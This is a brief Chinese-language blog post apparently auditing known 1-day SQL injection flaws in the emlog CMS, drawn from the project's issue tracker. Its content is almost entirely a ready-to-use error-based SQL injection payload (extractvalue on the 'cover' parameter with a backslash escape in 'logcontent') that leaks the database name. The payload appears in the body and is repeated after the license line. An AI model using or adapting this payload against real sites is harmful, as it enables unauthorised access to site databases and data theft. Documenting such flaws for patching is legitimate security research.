emlog的1day简单审计
简单审一些前台1day吧,前台的漏洞还真不怎么好挖,水后台的漏洞又没什么意思。两个简单的sql注入,Issues上看到的
auto_excerpt=y&logcontent=123\&as_logid=1&cover=or extractvalue(0x0a,concat(0x0a,(select database())))#

本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 L的博客!
评论
auto_excerpt=y&logcontent=123\&as_logid=1&cover=or extractvalue(0x0a,concat(0x0a,(select database())))#